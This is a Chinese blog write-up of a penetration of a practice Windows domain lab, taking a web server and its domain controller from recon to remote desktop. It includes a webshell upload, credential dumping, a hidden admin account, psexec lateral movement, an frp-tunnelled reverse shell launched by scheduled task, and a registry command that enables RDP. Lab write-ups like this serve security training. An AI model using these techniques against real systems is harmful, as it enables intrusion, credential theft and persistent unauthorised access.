【webhack123】域靶场渗透
three_1996 2024-07-31 10:33:01 阅读 100
环境部署
攻击机:kali(192.168.101.141)
web服务器:windows(外网ip:192.168.101.139)(内网ip:10.10.10.150)
域控服务器DC:windows 2016(内网ip:10.10.10.149)
一、信息收集
1、在kali中使用Nmap扫描ip和端口
nmap -sT 192.168.101.0/24 扫描网段,获取目标ip
nmap -A 192.168.101.139 扫描目标详细信息
nmap -A
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-05 19:34 CST
Nmap scan report for www.webhack123.com (192.168.101.139)
Host is up (0.0012s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: \xE7\xAB\x8B\xE5\x88\xBB\xE8\xB4\xB7 - \xE7\xAB\x8B\xE5\x88\xBB\xE8\xB4\xB7
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
3306/tcp open mysql?
3389/tcp open ms-wbt-server?
|_ssl-date: 2024-03-05T11:37:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=web.hackbox.com
| Not valid before: 2023-11-12T09:57:27
|_Not valid after: 2024-05-13T09:57:27
| rdp-ntlm-info:
| Target_Name: HACKBOX
| NetBIOS_Domain_Name: HACKBOX
| NetBIOS_Computer_Name: WEB
| DNS_Domain_Name: hackbox.com
| DNS_Computer_Name: web.hackbox.com
| DNS_Tree_Name: hackbox.com
| Product_Version: 6.1.7601
|_ System_Time: 2024-03-05T11:37:31+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:30:7E:49 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 210:
|_ Message signing enabled but not required
|_clock-skew: mean: -1h35m59s, deviation: 3h34m39s, median: 0s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-03-05T11:37:31
|_ start_date: 2024-03-05T11:25:13
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 000c29307e49 (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: web
| NetBIOS computer name: WEB\x00
| Domain name: hackbox.com
| Forest name: hackbox.com
| FQDN: web.hackbox.com
|_ System time: 2024-03-05T19:37:31+08:00
TRACEROUTE
HOP RTT ADDRESS
1 1.21 ms www.webhack123.com (192.168.101.139)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.81 seconds
此处扫描出web服务的版本信息
此处扫描出域名信息
此处扫描出web服务的域名
访问目标ip的80端口,发现禁止访问、尝试修改配置文件,通过域名访问
vim /etc/hosts
192.168.101.139 www.webhack123.com
2、web扫描
appscan
御剑
aux 扫出svn存储库漏洞
dirseach -u http://www.webhack123.com 收集可用url
[20:41:28] 200 - 6KB - /.DS_Store
[20:41:28] 200 - 6KB - /.ds_store
[20:41:30] 200 - 333B - /.idea/misc.xml
[20:41:30] 200 - 264B - /.idea/modules.xml
[20:41:30] 200 - 180B - /.idea/vcs.xml
[20:41:30] 200 - 38KB - /.idea/workspace.xml
[20:41:32] 200 - 3B - /.svn/entries
[20:41:32] 200 - 428KB - /.svn/wc.db
发现/.svn/wc.db是个可下载的文件。下载后可在kali中使用sqlitebrowser wc.db可打开数据库文件,也可以在物理机使用Navicat打开,查看该数据库文件。
发现NODES表中存在log日志文件,且包含登录的账号密码内容,将密码解密后逐个尝试web登录。
发现log文件中的账号为admin,密码解密出来为123456,多次尝试登录后提示密码错误,用户可能修改密码。
多次登录失败,发现登录界面只判断账号密码,验证码没有进行验证。
而登录失败,界面响应"status":0,
故在此使用burp进行密码爆破,推测登录成功的界面响应为"status":1。
获得账号密码,登录系统后台,尝试getshell。
二、GETshell
1、进入系统后台管理界面,熟悉界面,发现系统设置中可以修改允许上传的文件类型,将此处添加php,exe。
2、修改后,即可上传一句话木马和cs的监听木马。
3、上传后访问图片地址,确定文件上传成功,即可使用工具连接。
4、使用蚁剑链接后,发现是system权限账号。
5、通过蚁剑上传msf鉴定木马,web服务器上线。
三、内网信息收集
whoami /fqdn
CN=WEB,CN=Computers,DC=hackbox,DC=com
net time /domain
\\dc.hackbox.com 的当前时间是 2024/3/6 21:17:44
net user /domain
这项请求将在域 hackbox.com 的域控制器处理。
\\dc.hackbox.com 的用户帐户
-------------------------------------------------------------------------------
Administrator Guest krbtgt
systeminfo
meterpreter > sysinfo
Computer : WEB
OS : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : HACKBOX
Logged On Users : 1
Meterpreter : x64/windows
ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : web
主 DNS 后缀 . . . . . . . . . . . : hackbox.com
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
DNS 后缀搜索列表 . . . . . . . . : hackbox.com
phpstudy_pro> whoami /priv
特权信息
----------------------
特权名 描述 状态
=============================== ========================== ======
SeAssignPrimaryTokenPrivilege 替换一个进程级令牌 已禁用
SeLockMemoryPrivilege 锁定内存页 已启用
SeIncreaseQuotaPrivilege 为进程调整内存配额 已禁用
SeTcbPrivilege 以操作系统方式执行 已启用
SeSecurityPrivilege 管理审核和安全日志 已禁用
SeTakeOwnershipPrivilege 取得文件或其他对象的所有权 已禁用
SeLoadDriverPrivilege 加载和卸载设备驱动程序 已禁用
SeSystemProfilePrivilege 配置文件系统性能 已启用
SeSystemtimePrivilege 更改系统时间 已禁用
SeProfileSingleProcessPrivilege 配置文件单个进程 已启用
SeIncreaseBasePriorityPrivilege 提高计划优先级 已启用
SeCreatePagefilePrivilege 创建一个页面文件 已启用
SeCreatePermanentPrivilege 创建永久共享对象 已启用
SeBackupPrivilege 备份文件和目录 已禁用
SeRestorePrivilege 还原文件和目录 已禁用
SeShutdownPrivilege 关闭系统 已禁用
SeDebugPrivilege 调试程序 已启用
SeAuditPrivilege 生成安全审核 已启用
SeSystemEnvironmentPrivilege 修改固件环境值 已禁用
SeChangeNotifyPrivilege 绕过遍历检查 已启用
SeUndockPrivilege 从扩展坞上取下计算机 已禁用
SeManageVolumePrivilege 执行卷维护任务 已禁用
SeImpersonatePrivilege 身份验证后模拟客户端 已启用
SeCreateGlobalPrivilege 创建全局对象 已启用
SeIncreaseWorkingSetPrivilege 增加进程工作集 已启用
SeTimeZonePrivilege 更改时区 已启用
SeCreateSymbolicLinkPrivilege 创建符号链接 已启用
nltest /DClist:hackbox.com
获得域“hackbox.com”中 DC 的列表(从“\\dc.hackbox.com”中)。
dc.hackbox.com [PDC] [DS] 站点: Default-First-Site-Name
此命令成功完成
whoami /user
用户信息
----------------
用户名 SID
=================== ========
nt authority\system S-1-5-18
net view /domain
Domain
-------------------------------------------------------------------------------
HACKBOX
命令成功完成。
nslookup -type=SRV _ldap._tcp.hackbox.com
DNS request timed out.
timeout was 2 seconds.
������: UnKnown
Address: 10.10.10.149
_ldap._tcp.hackbox.com SRV service location:
priority = 0
weight = 100
port = 389
svr hostname = dc.hackbox.com
dc.hackbox.com internet address = 10.10.10.149
ping hackbox.com
正在 Ping hackbox.com [10.10.10.149] 具有 32 字节的数据:
来自 10.10.10.149 的回复: 字节=32 时间<1ms TTL=128
来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128
来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128
来自 10.10.10.149 的回复: 字节=32 时间=1ms TTL=128
10.10.10.149 的 Ping 统计信息:
net share
共享名 资源 注解
-------------------------------------------------------------------------------
C$ C:\ 默认共享
IPC$ 远程 IPC
ADMIN$ C:\Windows 远程管理
命令成功完成。
net view
服务器名称 注解
-------------------------------------------------------------------------------
\\DC
\\WEB
命令成功完成。
四、渗透域控主机,获取DC管理权
通过信息收集,整理部分信息如下:
域名:HACKBOX.com
域控:\\DC 10.10.10.149
域内主机:\\WEB 192.168.101.139 10.10.10.150
1、上线cs监听
由于msf中的mimikatz模块没有抓取到nltm,所以尝试使用getshell时上传的cs监听抓取
2、使用cs抓取NLTM
由于域控管理员未在web服务器主机上登录过,没有抓取到域控的NLTM,此处需要模拟社工手段,让域控管理员在域内主机登录一次后再次抓取。
此时,已成功抓取到域控管理员的NLTM与明文密码。
获取到NTLM值后再次使用net view,获取域内主机,发现获取到了一个新的域内目标主机:域控主机 \\DC
3、横向移动、获取\\DC权限、并创建影子用户
使用cs中的横向移动=>psexec
此时已拥有域控主机的admin权限,虽然没有直接上线DC,但可查看目录
及时创建影子用户,并加入管理员组、避免丢失权限
影子用户创建成功
五、MSF中上线DC
由于\\dc和kali不在同一网段,无法直接通讯。
所以上线dc需要搭建隧道,此处使用frp隧道,将服务器上传至web,默认开启7000端口。
kali配置好反弹端口后,开启客户端:
在DC上运行反弹(reverse_tcp)木马,反弹木马将自己的流量,反弹到WEB(192.168.101.139)的6000端口,经过frp隧道传输,交给kali(192.168.101.141)的9999端口,kali监听自身的9999即可上线DC。
使用kali生成监听DC的反向木马
在cs中将木马上传到\\DC\C$
kali启动监听,监听\\DC反弹,经过frp隧道传入kali的9999端口。
先在WEB服务器上使用\\DC权限,创建\\DC的网络链接
启动定时任务,在web服务器上,远程执行\\DC共享目录中的木马文件
shell at \\DC 17:03 \\DC\C$\DC_rev.exe
反弹成功,\\DC域控主机上线MSF
查看\\DC主机端口信息
六、打开DC远程桌面
1、配置路由、开启代理
由于上线DC时,是基于frp反弹隧道完成的,目前只有DC反弹到kali的路由。所以现在还需要再搭建一条kali到\\DC的路由隧道。此处使用MSF中的autoroute,自动路由。
基于WEB的session,使用autoroute后,就拥有了访问\\DC内网的路由。
2、开启MSF代理 auxiliary/server/socks_proxy,并配置全局代理:setg proxies socks5:127.0.0.1:1080
2、进入\\DC的会话,使用注册表命令开启RDP/3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3、登录\\DC远程桌面
修改kali的配置文件,修改代理。 配置 /etc/proxychains4.conf文件。
执行命令前加上proxychains即可使用socks5的代理运行命令。
使用kali自带的远程桌面工具登录\\DC
由于登录远程桌面需要账号密码,这里就可以用到之前创建的影子用户。
登录成功
声明
本文内容仅代表作者观点,或转载于其他网站,本站不以此文作为商业用途
如有涉及侵权,请联系本站进行删除
转载本站原创文章,请注明来源及作者。